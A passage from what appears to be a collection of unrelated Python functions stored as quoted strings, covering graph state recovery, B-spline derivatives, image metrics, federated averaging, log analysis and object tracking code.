operands. when data lost, mark the operand\n # and its successors as affected.\n affected_op_keys = set()\n for op_key in lost_ops:\n affected_op_keys.add(op_key)\n for n in op_key_to_chunks[op_key]:\n affected_op_keys.update(succ.op.key for succ in graph.iter_successors(n))\n\n # scan the graph from bottom and reassign new states\n new_states = dict()\n for chunk in graph.topological_iter(reverse=True):\n op_key = chunk.op.key\n if chunk.op.key not in affected_op_keys:\n continue\n\n can_be_ready = True\n stop_spread_states = (OperandState.RUNNING, OperandState.FINISHED)\n for pred in graph.iter_predecessors(chunk):\n pred_op_key = pred.op.key\n # mark affected, if\n # 1. data of the operand is lost\n # 2. 
state does not hold data, or data is lost,\n # for instance, operand is freed.\n if pred.key in lost_chunks or op_states.get(pred_op_key) not in stop_spread_states:\n affected_op_keys.add(pred_op_key)\n can_be_ready = False\n\n # update state given data preservation of prior nodes\n chunk_op_state = op_states.get(op_key)\n if can_be_ready and chunk_op_state != OperandState.READY:\n new_states[op_key] = OperandState.READY\n elif not can_be_ready and chunk_op_state != OperandState.UNSCHEDULED:\n new_states[op_key] = OperandState.UNSCHEDULED\n\n op_states.update(new_states)\n return new_states", "def __diff_internal(self):\n assert self.p > 0, \"order of Bspline must be > 0\" # we already handle the other case in diff()\n\n # https://www.cs.mtu.edu/~shene/COURSES/cs3621/NOTES/spline/B-spline/bspline-derv.html\n #\n t = self.knot_vector\n p = self.p\n bi = BsplineBasis(t[:-1], p - 1)\n bip1 = BsplineBasis(t[1:], p - 1)\n\n numer1 = +p\n numer2 = -p\n denom1 = t[p:-1] - t[:-(p + 1)]\n denom2 = t[(p + 1):] - t[1:-p]\n\n with np.errstate(divide='ignore', invalid='ignore'):\n ci = np.where(denom1 != 0., (numer1 / denom1), 0.)\n cip1 = np.where(denom2 != 0., (numer2 / denom2), 0.)\n\n return (ci, bi), (cip1, bip1)", "def comparison():\n path = \"Data/data_fronts/\"\n path1 = \"Results/labelled_images1010/fronts/\"\n\n #computes the areas for the first frame in order to normalize the other areas\n pol0 = pd.DataFrame(pd.read_csv(path1 + \"fronts_labelled.m.0.png.txt\",sep =' '))\n #makes an object polygon in order to compute the area\n pol0 = np.array(pol0)\n pol0 = Polygon(pol0)\n\n polsx = pd.DataFrame(pd.read_csv(path + \"Sham_8-2-18_Field 5_1_sx.txt\",sep ='\\t'))\n polsx.columns = [\"y\",\"x\"]\n poldx = pd.DataFrame(pd.read_csv(path + \"Sham_8-2-18_Field 5_1_dx.txt\",sep ='\\t'))\n poldx.columns = [\"y\",\"x\"]\n #makes an object polygon in order to compute the area\n polsx = polsx.append(poldx)\n polsx = np.array(polsx)\n pol1 = Polygon(polsx)\n\n\n areas = []\n areas_hand = []\n #computes the areas for all the frames\n for i in range(42):\n pol = pd.DataFrame(pd.read_csv(path1 + \"fronts_labelled.m.\"+str(i)+\".png.txt\",sep =' '))\n pol = np.array(pol)\n pol = Polygon(pol)\n #normalize the areas with respect to the area of the first frame\n areas.append(pol.area/pol0.area)\n\n polsx = pd.DataFrame(pd.read_csv(path + \"Sham_8-2-18_Field 5_\"+str(i+1)+\"_sx.txt\",sep ='\\t'))\n polsx.columns = [\"y\",\"x\"]\n poldx = pd.DataFrame(pd.read_csv(path + \"Sham_8-2-18_Field 5_\"+str(i+1)+\"_dx.txt\",sep ='\\t'))\n poldx.columns = [\"y\",\"x\"]\n if poldx[\"x\"][0]>100:\n poldx = poldx.reindex(index=poldx.index[::-1])\n if polsx[\"x\"][0]<100:\n polsx = polsx.reindex(index=polsx.index[::-1])\n polsx = polsx.append(poldx)\n polsx = np.array(polsx)\n\n pol2 = Polygon(polsx)\n #normalize the areas with respect to the area of the first frame\n areas_hand.append(pol2.area/pol1.area)\n #returns the two arrays with the normalized areas\n return np.array(areas) , np.array(areas_hand)", "def fast_comparison(path = \"Data/data_fronts/\",path1 = \"Results/modified_images/fronts/\"):\n #computes the areas for the first frame in order to normalize the other areas\n pol0dx = grid(path1+\"m_0.png_dx.txt\")\n pol0dx.columns = [\"y\",\"x\"]\n pol0sx = grid(path1+\"m_0.png_sx.txt\")\n pol0sx.columns = [\"y\",\"x\"]\n if pol0dx[\"x\"][0]>100:\n pol0dx = pol0dx.reindex(index=pol0dx.index[::-1])\n if pol0sx[\"x\"][0]<100:\n pol0sx = pol0sx.reindex(index=pol0sx.index[::-1])\n pol0sx = pol0sx.append(pol0dx)\n pol0sx = 
np.array(pol0sx)\n pol0 = Polygon(pol0sx)\n\n polsx = grid(path + \"Sham_8-2-18_Field 5_1_sx.txt\",l = 633,delimiter ='\\t')\n polsx.columns = [\"y\",\"x\"]\n polsx[\"y\"] =polsx[\"y\"]/844*1600\n polsx[\"x\"] =polsx[\"x\"]/633*1200\n poldx = grid(path + \"Sham_8-2-18_Field 5_1_dx.txt\",l = 633,delimiter ='\\t')\n poldx.columns = [\"y\",\"x\"]\n poldx[\"y\"] =poldx[\"y\"]/844*1600\n poldx[\"x\"] =poldx[\"x\"]/633*1200\n if poldx[\"x\"][0]>100:\n poldx = poldx.reindex(index=poldx.index[::-1])\n if polsx[\"x\"][0]<100:\n polsx = polsx.reindex(index=polsx.index[::-1])\n #makes an object polygon in order to compute the area\n polsx = polsx.append(poldx)\n polsx = np.array(polsx)\n pol1 = Polygon(polsx)\n\n\n areas = []\n areas_hand = []\n #computes the areas for all the frames\n for i in range(42):\n poldx = grid(path1+\"m_\"+str(i)+\".png_dx.txt\")\n poldx.columns = [\"y\",\"x\"]\n polsx = grid(path1+\"m_\"+str(i)+\".png_sx.txt\")\n polsx.columns = [\"y\",\"x\"]\n if poldx[\"x\"][0]>100:\n poldx = poldx.reindex(index=poldx.index[::-1])\n if polsx[\"x\"][0]<100:\n polsx = polsx.reindex(index=polsx.index[::-1])\n polsx = polsx.append(poldx)\n polsx = np.array(polsx)\n\n #makes an object polygon in order to compute the area\n\n pol = Polygon(polsx)\n\n #normalize the areas with respect to the area of the first frame\n areas.append(pol.area/pol0.area)\n\n polsx = grid(path + \"Sham_8-2-18_Field 5_\"+str(i+1)+\"_sx.txt\",l = 633,delimiter ='\\t')\n polsx.columns = [\"y\",\"x\"]\n polsx[\"y\"] =polsx[\"y\"]/844*1600\n polsx[\"x\"] =polsx[\"x\"]/633*1200\n poldx = grid(path + \"Sham_8-2-18_Field 5_\"+str(i+1)+\"_dx.txt\",l = 633,delimiter='\\t')\n poldx.columns = [\"y\",\"x\"]\n poldx[\"y\"] =poldx[\"y\"]/844*1600\n poldx[\"x\"] =poldx[\"x\"]/633*1200\n if poldx[\"x\"][0]>100:\n poldx = poldx.reindex(index=poldx.index[::-1])\n if polsx[\"x\"][0]<100:\n polsx = polsx.reindex(index=polsx.index[::-1])\n polsx = polsx.append(poldx)\n polsx = np.array(polsx)\n\n pol2 = Polygon(polsx)\n #normalize the areas with respect to the area of the first frame\n areas_hand.append(pol2.area/pol1.area)\n #returns the two arrays with the normalized areas\n return np.array(areas) , np.array(areas_hand)", "def _analyze(self):\r\n if self.value is None or self.value == self.previous:\r\n pass\r\n elif self._operation == \"add\":\r\n self._additions = self.value\r\n elif self._operation == \"remove\":\r\n self._removals = self.value\r\n elif self.previous is None:\r\n self._assignments = self.value\r\n else:\r\n # partial update time\r\n self._additions = (self.value - self.previous) or None\r\n self._removals = (self.previous - self.value) or None\r\n self._analyzed = True", "def process_traces(subdirs,dates,load_path):\n\n N = 60*60*24*len(dates)*10\n\n firing_rates_storage = np.zeros((N))\n var_storage = np.zeros((N))\n position_storage = np.zeros((N,2))\n firing_rates_storage[:] = np.nan\n var_storage[:] = np.nan\n timestamps = np.zeros((N))\n clusters = np.zeros((N))\n pk_max = 0\n n=0\n\n for subdir,date in zip(subdirs,dates):\n \n dpk = pk_max \n path = load_path+'/%s/'%subdir\n file = [i for i in os.listdir(path) if '.pkl' in i] \n \n if len(file) == 0:\n continue\n \n pd_ob = pkl.load(open(path+file[0],'rb'))\n \n positions = pd_ob['positions']\n sts = pd_ob['sts']\n isis = pd_ob['isis']\n fsts = pd_ob['fsts']\n fisis = pd_ob['fisis']\n et = pd_ob['et']\n ep = pd_ob['ep']\n \n max_time = 0\n for k,v in sts.items():\n max_time = max(max_time,np.max(v))\n \n for t in np.arange(0,np.floor(max_time)):\n\n for i,pk in 
enumerate(sts.keys()):\n if np.count_nonzero((sts[pk]>t) & (sts[pk]<(t+1))) > 1:\n\n p = positions[pk][:-1]\n\n x = sts[pk]\n y = isis[pk]\n fx = fsts[pk]\n fy = fisis[pk]\n\n firing_rates_storage[n] = np.nanmean(y[(x>t) & (x<t+1)])\n var_storage[n] = np.nanvar(y[(x>t) & (x<t+1)])\n position_storage[n] = np.nanmean(p[(x>t) & (x<t+1)],axis=0)\n timestamps[n] = (date + timedelta(0,int(t))).timestamp()\n clusters[n] = pk + dpk\n n=n+1\n pk_max = max(pk_max,pk+dpk)\n\n firing_rates_storage = firing_rates_storage[:n]\n var_storage = var_storage[:n]\n position_storage = position_storage[:n]\n timestamps = timestamps[:n]\n clusters = clusters[:n]\n\n np.savez(load_path+'processed_traces.npz',frs=firing_rates_storage,vs=var_storage,pos=position_storage,ts=timestamps,cl=clusters)\n return 0", "def test_calculate_indicates_removal_of_unrelated_files(self, m_free):\n # files are unrelated to backup\n walk_paths = {'/dst': [('/dst', ['/a'], ['x0.txt']),\n ('/dst/a', [], ['x1.txt'])]}\n copied_indexes = []\n reconciler = keepfilesreconciler.KeepFilesReconciler(self.resolver, self.options)\n with filesystemhelpers.mock_walk(walk_paths):\n filepaths = reconciler.calculate(self.copyfiles, copied_indexes)\n assert filepaths == {'/dst/a/x1.txt', '/dst/x0.txt'}", "def compare_old_and_new_change_status_files():\n rdict=dict()\n mastcontrol=dirutil.get_mast_control_path()\n mastscratch=dirutil.get_mast_scratch_path()\n recipedirs=dirutil.immediate_subdirs(os.path.join(mastcontrol,\"changestatusfiles\"))\n for recipedir in recipedirs:\n mystatus=\"unknown\"\n rdict[recipedir]=dict()\n changelist=list()\n if not os.path.exists(os.path.join(mastscratch,recipedir)):\n mystatus=\"archived\"\n else:\n ingreddirs = dirutil.immediate_subdirs(os.path.join(mastcontrol,\"changestatusfiles\",recipedir))\n for ingreddir in ingreddirs:\n scratchstatusfile = MASTFile(os.path.join(mastscratch,recipedir,ingreddir,\"change_status.txt\"))\n controlstatusfile = MASTFile(os.path.join(mastcontrol,\"changestatusfiles\",recipedir,ingreddir,\"change_status.txt\"))\n if scratchstatusfile.data == controlstatusfile.data:\n mystatus=\"unchanged\"\n else:\n mystatus=\"changed\"\n rdict[recipedir][ingreddir]=\"send\"\n rdict[recipedir][\"MAIN\"]=mystatus\n return rdict", "def check_unstaged_changes(self):\n pass", "def _average_plan_diffs(self, server_config: dict, cycle):\n logging.info(\"start diffs averaging!\")\n logging.info(\"cycle: %s\" % str(cycle))\n logging.info(\"fl id: %d\" % cycle.fl_process_id)\n _model = model_manager.get(fl_process_id=cycle.fl_process_id)\n logging.info(\"model: %s\" % str(_model))\n model_id = _model.id\n logging.info(\"model id: %d\" % model_id)\n _checkpoint = model_manager.load(model_id=model_id)\n logging.info(\"current checkpoint: %s\" % str(_checkpoint))\n model_params = model_manager.unserialize_model_params(_checkpoint.values)\n logging.info(\"model params shapes: %s\" % str([p.shape for p in model_params]))\n\n # Here comes simple hardcoded avg plan\n # it won't be always possible to retrieve and unserialize all diffs due to memory constrains\n # needs some kind of iterative or streaming approach,\n # e.g.\n # for diff_N in diffs:\n # avg = avg_plan(avg, N, diff_N)\n # and the plan is:\n # avg_next = (avg_current*(N-1) + diff_N) / N\n reports_to_average = self._worker_cycles.query(\n cycle_id=cycle.id, is_completed=True\n )\n diffs = [\n model_manager.unserialize_model_params(report.diff)\n for report in reports_to_average\n ]\n\n # Again, not sure max_workers == number of diffs to avg\n diffs = 
random.sample(diffs, server_config.get(\"max_workers\"))\n\n raw_diffs = [\n [diff[model_param] for diff in diffs]\n for model_param in range(len(model_params))\n ]\n logging.info(\"raw diffs lengths: %s\" % str([len(row) for row in raw_diffs]))\n\n sums = [reduce(th.add, param) for param in raw_diffs]\n logging.info(\"sums shapes: %s\" % str([sum.shape for sum in sums]))\n\n diff_avg = [th.div(param, len(diffs)) for param in sums]\n logging.info(\"diff_avg shapes: %s\" % str([d.shape for d in diff_avg]))\n\n # apply avg diff!\n _updated_model_params = [\n model_param - diff_param\n for model_param, diff_param in zip(model_params, diff_avg)\n ]\n logging.info(\n \"_updated_model_params shapes: %s\"\n % str([p.shape for p in _updated_model_params])\n )\n\n # make new checkpoint\n serialized_params = model_manager.serialize_model_params(_updated_model_params)\n _new_checkpoint = model_manager.save(model_id, serialized_params)\n logging.info(\"new checkpoint: %s\" % str(_new_checkpoint))\n\n # mark current cycle completed\n cycle.is_completed = True\n self._cycles.update()\n\n completed_cycles_num = self._cycles.count(\n fl_process_id=cycle.fl_process_id, is_completed=True\n )\n logging.info(\"completed_cycles_num: %d\" % completed_cycles_num)\n max_cycles = server_config.get(\"num_cycles\")\n if completed_cycles_num < max_cycles:\n # make new cycle\n _new_cycle = self.create(cycle.fl_process_id, cycle.version)\n logging.info(\"new cycle: %s\" % str(_new_cycle))\n else:\n logging.info(\"FL is done!\")", "def compute_error_metrics(original, altered, results, converterOpts=None):\n import math\n from tempfile import TemporaryDirectory\n\n import large_image_source_tiff\n import numpy as np\n import packaging\n import skimage.metrics\n\n lastlog = 0\n with TemporaryDirectory() as tempDir:\n # TODO: check if the original is geospatial; if so appropriate options\n tempPath = os.path.join(tempDir, os.path.basename(original) + '.tiff')\n orig = large_image_converter.convert(original, tempPath, compression='lzw')\n tsOrig = large_image_source_tiff.open(orig)\n numFrames = len(tsOrig.getMetadata().get('frames', [0]))\n tsAlt = large_image_source_tiff.open(altered)\n mse = 0\n ssim = 0\n ssim_count = 0\n maxval = 0\n maxdiff = 0\n sum = 0\n count = 0\n tileSize = 2048\n for frame in range(numFrames):\n tiAlt = tsAlt.tileIterator(tile_size=dict(width=tileSize), frame=frame)\n for tileOrig in tsOrig.tileIterator(tile_size=dict(width=tileSize), frame=frame):\n tileAlt = next(tiAlt)\n do = tileOrig['tile']\n da = tileAlt['tile']\n if do.dtype != da.dtype and da.dtype == np.uint8:\n da = da.astype(int) * 257\n do = do.astype(int)\n da = da.astype(int)\n maxval = max(maxval, do.max(), da.max())\n if do.shape[2] > da.shape[2]:\n do = do[:, :, :da.shape[2]]\n if da.shape[2] > do.shape[2]:\n da = da[:, :, :do.shape[2]]\n diff = np.absolute(do - da)\n maxdiff = max(maxdiff, diff.max())\n sum += diff.sum()\n count += diff.size\n last_mse = np.mean(diff ** 2)\n mse += last_mse * diff.size\n last_ssim = 0\n try:\n kwargs = {}\n if (packaging.version.parse(skimage.__version__) >=\n packaging.version.parse('0.19')):\n kwargs['channel_axis'] = 2 if len(do.shape) > 2 else None\n else:\n kwargs['multichannel'] = len(do.shape) > 2\n last_ssim = skimage.metrics.structural_similarity(\n do.astype(float), da.astype(float),\n data_range=255 if tileOrig['tile'].dtype == np.uint8 else 65535,\n gaussian_weights=True, sigma=1.5, use_sample_covariance=False,\n **kwargs)\n ssim += last_ssim * diff.size\n ssim_count += diff.size\n 
except ValueError:\n pass\n if time.time() - lastlog >= 10 and ssim_count:\n logger.debug(\n 'Calculating error (%d/%d): rmse %4.2f ssim %6.4f '\n 'last rmse %4.2f ssim %6.4f',\n tileOrig['tile_position']['position'] + 1 +\n tileOrig['iterator_range']['position'] * frame,\n tileOrig['iterator_range']['position'] * numFrames,\n (mse / count) ** 0.5, ssim / ssim_count,\n last_mse ** 0.5, last_ssim)\n lastlog = time.time()\n results['maximum_error'] = maxdiff\n results['average_error'] = sum / count\n results['rmse'] = (mse / count) ** 0.5\n results['psnr'] = 10 * math.log10(\n maxval ** 2 / (mse / count)) if mse else None\n if ssim_count:\n results['ssim'] = ssim / ssim_count\n logger.debug('Calculated error: rmse %4.2f psnr %3.1f ssim %6.4f',\n results['rmse'], results['psnr'] or 0, results['ssim'])", "def get_resulting_diffs():\n diff_dirpath = application.join_abs_path(\n EMPTY_TEST_DIR, application.OUTPUT_DIR_NAME)\n diffleft_filename = application.join_abs_path(\n diff_dirpath, application.OUTPUT_DIFF_LEFT_FILENAME)\n diffright_filename = application.join_abs_path(\n diff_dirpath, application.OUTPUT_DIFF_RIGHT_FILENAME)\n\n diff_left = read_gzip_file_lines_into_set(diffleft_filename)\n diff_right = read_gzip_file_lines_into_set(diffright_filename)\n\n return diff_left, diff_right", "def avg_metric(sharp_path, deblurred_path): # TODO1 do multiprocessing in those methods\n sum_psnr = 0\n sum_mse = 0\n sum_ssim = 0\n\n # List all files\n files_orig = [f for f in listdir(sharp_path) if isfile(join(sharp_path, f))]\n files_deb = [f for f in listdir(deblurred_path) if isfile(join(deblurred_path, f))]\n\n count = 0\n for orig, deb in zip(files_orig, files_deb):\n orig_fn = join(sharp_path, orig)\n deb_fn = join(deblurred_path, deb)\n # Load images\n orig_img = cv2.imread(orig_fn)\n deb_img = cv2.imread(deb_fn)\n orig_img = np.divide(orig_img, 255)\n deb_img = np.divide(deb_img, 255)\n\n # Compute metrics\n sum_psnr += peak_signal_noise_ratio(orig_img, deb_img)\n sum_mse += mean_squared_error(orig_img, deb_img)\n sum_ssim += structural_similarity(orig_img, deb_img, multichannel=True)\n\n count += 1\n print('Analyzed: {}/{}'.format(count, len(files_orig)))\n\n # Average\n avg_psnr = sum_psnr/len(files_orig)\n avg_mse = sum_mse/len(files_orig)\n avg_ssim = sum_ssim/len(files_orig)\n\n return avg_mse, avg_psnr, avg_ssim", "def check_error(self):\n refine_results = {}\n for phase_path, phase in self.phases.items():\n refine_results[phase_path] = {}\n\n # Save the original grid to the refine results\n tx = phase.options['transcription']\n gd = tx.grid_data\n num_nodes = gd.subset_num_nodes['all']\n numseg = gd.num_segments\n\n refine_results[phase_path]['num_segments'] = numseg\n refine_results[phase_path]['order'] = gd.transcription_order\n refine_results[phase_path]['segment_ends'] = gd.segment_ends\n refine_results[phase_path]['need_refinement'] = np.zeros(numseg, dtype=bool)\n refine_results[phase_path]['error'] = np.zeros(numseg, dtype=float)\n\n if isinstance(tx, dm.RungeKutta):\n continue\n\n outputs = phase.list_outputs(units=False, out_stream=None)\n\n out_values_dict = {k: v['value'] for k, v in outputs}\n\n prom_to_abs_map = phase._var_allprocs_prom2abs_list['output']\n\n num_scalar_states = 0\n for state_name, options in phase.state_options.items():\n shape = options['shape']\n size = np.prod(shape)\n num_scalar_states += size\n\n x = np.zeros([num_nodes, num_scalar_states])\n f = np.zeros([num_nodes, num_scalar_states])\n c = 0\n\n # Obtain the solution on the current grid\n for 
state_name, options in phase.state_options.items():\n prom_name = f'timeseries.states:{state_name}'\n abs_name = prom_to_abs_map[prom_name][0]\n rate_source_prom_name = f\"timeseries.state_rates:{state_name}\"\n rate_abs_name = prom_to_abs_map[rate_source_prom_name][0]\n x[:, c] = out_values_dict[prom_name].ravel()\n f[:, c] = out_values_dict[rate_source_prom_name].ravel()\n c += 1\n\n # Obtain the solution on the new grid\n # interpolate x at t_hat\n new_order = gd.transcription_order + 1\n # Gauss-Lobatto does not allow even orders so increase order by 2 instead\n if gd.transcription == 'gauss-lobatto':\n new_order += 1\n new_grid = GridData(numseg, gd.transcription, new_order, gd.segment_ends, gd.compressed)\n left_end_idxs = new_grid.subset_node_indices['segment_ends'][0::2]\n left_end_idxs = np.append(left_end_idxs, new_grid.subset_num_nodes['all'] - 1)\n\n L = interpolation_lagrange_matrix(gd, new_grid)\n I = integration_matrix(new_grid)\n\n # Call the ODE at all nodes of the new grid\n x_hat, x_prime = self.eval_ode(phase, new_grid, L, I)\n E = {}\n e = {}\n err_over_states = {}\n for state_name, options in phase.state_options.items():\n E[state_name] = np.absolute(x_prime[state_name] - x_hat[state_name])\n for k in range(0, numseg):\n e[state_name] = E[state_name]/(1 + np.max(x_hat[state_name][left_end_idxs[k]:left_end_idxs[k + 1]]))\n err_over_states[state_name] = np.zeros(numseg)\n\n for state_name, options in phase.state_options.items():\n for k in range(0, numseg):\n err_over_states[state_name][k] = np.max(e[state_name][left_end_idxs[k]:left_end_idxs[k + 1]])\n\n self.error[phase_path] = np.zeros(numseg)\n refine_results[phase_path]['error'] = np.zeros(numseg)\n refine_results[phase_path]['need_refinement'] = np.zeros(numseg, dtype=bool)\n\n # Assess the errors in each state\n for state_name, options in phase.state_options.items():\n for k in range(0, numseg):\n if err_over_states[state_name][k] > self.error[phase_path][k]:\n self.error[phase_path][k] = err_over_states[state_name][k]\n refine_results[phase_path]['error'][k] = err_over_states[state_name][k]\n if self.error[phase_path][k] > phase.refine_options['tolerance']:\n refine_results[phase_path]['need_refinement'][k] = True\n\n return refine_results", "def errdump_analysis(errdump_df, switchshow_df, switch_params_aggregated_df, \n portshow_aggregated_df, project_constants_lst):\n \n # imported project constants required for module execution\n project_steps_df, max_title, io_data_names_df, _, report_headers_df, report_columns_usage_sr, *_ = project_constants_lst\n\n # data titles obtained after module execution (output data)\n # data titles which module is dependent on (input data)\n data_names, analyzed_data_names = dfop.list_from_dataframe(io_data_names_df, 'errorlog_analysis_out', 'errorlog_analysis_in')\n # module information\n meop.show_module_info(project_steps_df, data_names)\n # read data from database if they were saved on previos program execution iteration\n data_lst = dbop.read_database(project_constants_lst, *data_names)\n \n # force run when any output data from data_lst is not found in database or \n # procedure execution explicitly requested (force_run flag is on) for any output or input data \n force_run = meop.verify_force_run(data_names, data_lst, project_steps_df, \n max_title, analyzed_data_names)\n if force_run:\n # data imported from init file (regular expression patterns) to extract values from data columns\n pattern_dct, _ = sfop.regex_pattern_import('raslog_split', max_title)\n 
raslog_message_details_df = sfop.dataframe_import('raslog_details', max_title)\n raslog_message_id_details_df = sfop.dataframe_import('raslog_id_details', max_title, columns=['Message_ID', 'Details', 'Recommended_action'])\n\n # current operation information string\n info = f'Counting RASLog messages'\n print(info, end =\" \")\n\n # get aggregated DataFrames\n errdump_aggregated_df = errdump_aggregated(errdump_df, switchshow_df, switch_params_aggregated_df, \n portshow_aggregated_df, pattern_dct)\n # count how many times event appears during one month for the last six months \n raslog_counter_df, raslog_frequent_df = errdump_statistics(errdump_aggregated_df, raslog_message_details_df, raslog_message_id_details_df)\n # after finish display status\n meop.status_info('ok', max_title, len(info)) \n # partition aggregated DataFrame to required tables\n raslog_report_df = raslog_report(raslog_frequent_df, data_names, report_headers_df, report_columns_usage_sr)\n\n # create list with partitioned DataFrames\n data_lst = [errdump_aggregated_df, raslog_counter_df, raslog_report_df]\n # writing data to sql\n dbop.write_database(project_constants_lst, data_names, *data_lst)\n # verify if loaded data is empty and replace information string with empty DataFrame\n else:\n data_lst = dbop.verify_read_data(max_title, data_names, *data_lst)\n errdump_aggregated_df, raslog_counter_df, *_ = data_lst\n # save data to service file if it's required\n for data_name, data_frame in zip(data_names, data_lst):\n report.dataframe_to_excel(data_frame, data_name, project_constants_lst)\n return errdump_aggregated_df, raslog_counter_df", "def __getHoldingsTransferred(self, dirPath=None):\n trsfD = {}\n insD = {}\n dirPath = dirPath if dirPath else self.__sandboxPath\n\n try:\n fp = os.path.join(dirPath, \"status\", \"theoretical_model_obsolete.tsv\")\n lineL = self.__mU.doImport(fp, \"list\") # pylint: disable=no-member\n #\n obsDateD = {}\n obsIdD = {}\n for line in lineL:\n fields = line.split(\"\\t\")\n if len(fields) < 3:\n continue\n entryId = str(fields[0]).strip().upper()\n obsDateD[entryId] = dateutil.parser.parse(fields[2]) if self.__assignDates else fields[2]\n if len(fields) > 3 and len(fields[3]) > 3:\n obsIdD[entryId] = str(fields[3]).strip().upper()\n logger.debug(\"Read %d obsolete insilico id codes\", len(obsDateD))\n # --------- --------- --------- --------- --------- --------- ---------\n fp = os.path.join(dirPath, \"status\", \"model-archive-PDB-insilico-mapping.list\")\n lineL = self.__mU.doImport(fp, \"list\")\n #\n trD = {}\n for line in lineL:\n fields = line.split(\":\")\n if len(fields) < 2:\n continue\n entryId = str(fields[1]).strip().upper()[:4]\n maId = str(fields[0]).strip()\n trD[entryId] = maId\n logger.debug(\"Read %d model archive id codes\", len(trD))\n #\n # --------- --------- --------- --------- --------- --------- ---------\n fp = os.path.join(dirPath, \"status\", \"theoretical_model_v2.tsv\")\n lineL = self.__mU.doImport(fp, \"list\")\n #\n logger.debug(\"Read %d insilico id codes\", len(lineL))\n for line in lineL:\n fields = str(line).split(\"\\t\")\n if len(fields) < 6:\n continue\n depDate = dateutil.parser.parse(fields[2]) if self.__assignDates else fields[2]\n relDate = None\n if len(fields[3]) >= 10 and not fields[3].startswith(\"0000\"):\n relDate = dateutil.parser.parse(fields[3]) if self.__assignDates else fields[3]\n\n statusCode = \"TRSF\" if fields[1] == \"REL\" else fields[1]\n\n entryId = str(fields[0]).upper()\n title = fields[4]\n #\n auditAuthors = [t.strip() for 
t in fields[5].split(\";\")]\n repId = None\n repName = None\n if entryId in trD:\n repName = \"Model Archive\"\n repId = trD[entryId]\n\n #\n dD = {\n \"status_code\": statusCode,\n \"deposit_date\": depDate,\n \"repository_content_types\": [\"coordinates\"],\n \"title\": title,\n \"audit_authors\": auditAuthors,\n }\n #\n if relDate:\n dD[\"release_date\"] = relDate\n #\n if repId:\n dD[\"remote_accession_code\"] = repId\n dD[\"remote_repository_name\"] = repName\n if statusCode == \"TRSF\":\n trsfD[entryId] = dD\n #\n #\n dD = {\"status_code\": statusCode, \"deposit_date\": depDate, \"title\": title, \"audit_authors\": auditAuthors}\n #\n if relDate:\n dD[\"release_date\"] = relDate\n #\n if entryId in obsDateD:\n dD[\"remove_date\"] = relDate\n #\n if entryId in obsIdD:\n dD[\"id_codes_replaced_by\"] = [obsIdD[entryId]]\n #\n insD[entryId] = dD\n #\n logger.info(\"Transferred entries %d - insilico models %d\", len(trsfD), len(insD))\n #\n except Exception as e:\n logger.exception(\"Failing with %s\", str(e))\n\n return trsfD, insD", "def main_pipeline(self, image):\n # detection\n t0 = datetime.now()\n bbox_list, score_list, label_list = self.det.inference(image)\n t1 = datetime.now()\n logging.info('main pipeline (det): {}'.format(get_tdiff(t0, t1)))\n \n # estimation\n t0 = datetime.now()\n disp = self.est.inference(image)\n depth_list = self.est.calc_depth(bbox_list)\n t1 = datetime.now()\n logging.info('main pipeline (est): {}'.format(get_tdiff(t0, t1)))\n \n # tracker predict\n t0 = datetime.now()\n for t in self.t_list:\n t.predict()\n t1 = datetime.now()\n logging.info('main pipeline (trk_pred): {}'.format(get_tdiff(t0, t1)))\n \n # associate\n t0 = datetime.now()\n matched_pair, unmatched_bbox_list, _ = associate(bbox_list, label_list, self.t_list)\n t1 = datetime.now()\n logging.info('main pipeline (da_solver): {}'.format(get_tdiff(t0, t1)))\n \n t0 = datetime.now()\n # update trackers for matched_pair\n for m in matched_pair:\n t = self.t_list[m[1]]\n bbox = bbox_list[m[0]]\n depth = depth_list[m[0]]\n est_dict = {\n 'label': label_list[m[0]],\n 'score': score_list[m[0]]}\n t.update(self.frame_idx, bbox, depth, est_dict)\n \n # update in-track status of all trackers\n for t in self.t_list:\n t.update_status(self.frame_idx)\n \n # purge out dead trackers\n self.t_list = [t for t in self.t_list if t.get_status()]\n\n # create new trackers for unmatched_bbox_list\n for b_idx in unmatched_bbox_list:\n bbox = bbox_list[b_idx]\n depth = depth_list[b_idx]\n est_dict = {\n 'label': label_list[b_idx],\n 'score': score_list[b_idx]}\n self.t_list.append(tracker(self.t_cfg, self.tid_new, bbox, depth, est_dict))\n self.tid_new += 1\n\n t1 = datetime.now()\n logging.info('main pipeline (trk_upd): {}'.format(get_tdiff(t0, t1)))\n\n # disparity map for display\n return disp", "def read_inversion_info(file_dic):\n #print_file_test = open('file_test.txt','w')\n\n if not ( check_inversion_files(file_dic) ):\n print 'error(read_inversion_info): problem with lenstool file names'\n return 0\n \n file_generate_arcs = file_dic['file_generate_arcs']\n info_input_lens = fc.extract_second_identifiers( file_generate_arcs, \\\n 'potential' )\n#-------------------------------------------------------------------------------\n\n file_source = file_dic['file_source']\n info_src = np.loadtxt(file_source, unpack=False)\n if len(info_src) == 8 and np.isscalar(info_src[0]):\n #FIXME - check if the second condition is all we need\n info_src = 
[info_src]\n#-------------------------------------------------------------------------------\n\n file_make_inversion = file_dic['file_make_inversion']\n info_fited_param = fc.extract_second_identifiers( file_make_inversion, \\\n 'limit' )\n info_forme = fc.extract_parameter(file_make_inversion, 'forme')[0][0]\n\n#-------------------------------------------------------------------------------\n\n file_best_fit = file_dic['file_best_fit']\n info_best_fit = fc.extract_second_identifiers( file_best_fit, \\\n 'potentiel' )\n\n info_xi2 = fc.extract_parameter(file_best_fit, '#Chi2pos:')\n\n#-------------------------------------------------------------------------------\n file_chires = file_dic['file_chires']\n\n info_chires = extract_parameter(file_chires, '0')\n rmss_mean = [0.0, 0.0]\n rmsi_mean = [0.0, 0.0]\n for i in info_chires:\n if i[0] != 'A':\n rmss_mean[0] = rmss_mean[0] + float(i[7])\n rmss_mean[1] = rmss_mean[1] + 1.0\n \n rmsi_mean[0] = rmsi_mean[0] + float(i[8])\n rmsi_mean[1] = rmsi_mean[1] + 1.0\n\n rmss_mean = rmss_mean[0]/rmss_mean[1]\n rmsi_mean = rmsi_mean[0]/rmsi_mean[1]\n#-------------------------------------------------------------------------------\n out_dict = { 'xi2' : float(info_xi2[0][0]), \\\n 'best_fit_lens' : info_best_fit, \\\n 'rmsi_mean' : rmsi_mean, \\\n 'rmss_mean' : rmss_mean, \\\n 'fited_parameters' : info_fited_param[0].keys(), \\\n 'input_lens' : info_input_lens[len(info_input_lens) - 1], \\\n 'forme' : info_forme \\\n }\n #for i in out_dict.keys():\n # print i, out_dict[i]\n return out_dict", "def compute_differences(pts_important, jparams):\n print(\"=== Computing differences ===\")\n start = time.time()\n print(\"start measuring time of compute_differences\")\n input_data = 